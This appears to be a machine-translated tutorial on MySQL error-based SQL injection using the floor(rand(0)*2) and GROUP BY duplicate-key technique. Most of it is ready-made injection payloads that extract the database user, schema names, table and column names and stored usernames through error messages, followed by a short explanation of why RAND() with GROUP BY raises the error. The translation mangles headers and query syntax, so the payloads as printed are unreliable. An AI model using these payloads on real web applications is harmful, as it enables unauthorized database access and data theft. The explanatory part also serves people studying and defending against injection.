Analysis of the principle of MySQL error injection in depth analysis

Read about the MySQL error injection of technical articles, are similar to the following statements are injected. Such a statement is called the formula "formula", a lot of small dishes are used directly, do not know why this is. But I have to have this kind of two goods must understand these words.

Let's take a look at the whole process of injection:

Admin ' Union Select 1 from (SELECT COUNT (*), concat (Floor (rand (0) *2), (select User () limit 0,1))-A from INFORMATION_SCHEMA.T Ables GROUP by a) b#

Explode all libraries

and (select 1 from (SELECT COUNT (*), concat ((Select) (SELECT DISTINCT concat (0x7e,0x27,schema_name,0x27,0x7e) from Information_schema.schemata LIMIT 0,1)) from Information_schema.tables LIMIT 0,1), Floor (rand (0) *2)) x from Information_ Schema.tables GROUP by X) a) #

Explode current Database

Username=-99999999999′and (select 1 from (SELECT COUNT (*), concat () (Select () (select Concat () (cast) (The database () As Char)) (0x27,0x7e)) from Information_schema.tables limit 0,1), floor (rand (0) *2)) x from Information_schema.tables Group by X) a) #

Explosion meter

and (select 1 from (SELECT COUNT (*), concat ((Select) (SELECT DISTINCT concat (0x7e,0x27,hex (CAST (table_name as Char) ), 0x27,0x7e) from information_schema.tables where table_schema=0x64656d6f limit 0,1)) from Information_schema.tables Limit 0,1), floor (rand (0) *2)) x from Information_schema.tables Group by X) #

Burst field

and (select 1 from (SELECT COUNT (*), concat ((Select) (SELECT DISTINCT concat (0x7e,0x27,column_name,0x27,0x7e) from Information_schema.columns where table_schema=0x64656d6f and table_name=0x75736572 limit 0,1)) from

Information_schema.tables limit 0,1), floor (rand (0) *2)) x from Information_schema.tables Group by X) #

Explosive content

and (select 1 from (SELECT COUNT (*), concat ((Select) (select Concat (0x7e,0x27,user.username,0x27,0x7e) from user Limit 0,1)) from Information_schema.tables limit 0,1), floor (rand (0) *2)) x to Information_schema.tables Group by X) #

The purpose of the burst was reached, and these statements made me most incomprehensible to floor (rand (0) *2), group by X, who was completely unaware of what was being taken out.

Check the relevant information in the MySQL official introduction to find the answer:
RAND () in a WHERE clause is re-evaluated every the where is executed.
You are cannot use a column with RAND () of the clause, because order by would evaluate the column multiple time S.

It means that RAND () can no longer be used in the order by.

Then you can't use GROUP by anymore.

If you use it, you will get an error.

Admin ' Union Select 1 from (SELECT COUNT (*), concat (Floor (rand (0) *2), (select User () limit 0,1))-A from INFORMATION_SCHEMA.T Ables GROUP by a) b#
A is: concat (Floor (rand (0) *2), (select User () limit 0,1))

There is Rand, followed by the group by a statement, so the error duplicate entry ' root ' for key ' Group_key '
And here "' Xxxxxxxxxx" is the content of user (), so there is a username.

You can do the following tests:
The error:
Select ID from keyword WHERE id=1 UNION select 1 from (select COUNT (*), CONCAT (FLOOR (RAND (0) *2), select CONCAT (0x5f,databas E (), 0x5f,user (), 0x5f,version ()))) (A from Information_schema.tables GROUP by a) b–

There is no error after removing Rand:
Select ID from keyword WHERE id=1 UNION select 1 from (select COUNT (*), CONCAT (0, select CONCAT (0x5f,database (), 0x5f,user () , 0x5f,version ()))) (a) Information_schema.tables GROUP by a) b–

Remove GROUP by a without an error:
Select ID from keyword WHERE id=1 UNION select 1 from (select COUNT (*), CONCAT (FLOOR (RAND (0) *2), select CONCAT (0x5f,databas E (), 0x5f,user (), 0x5f,version ())) (A from Information_schema.tables) b–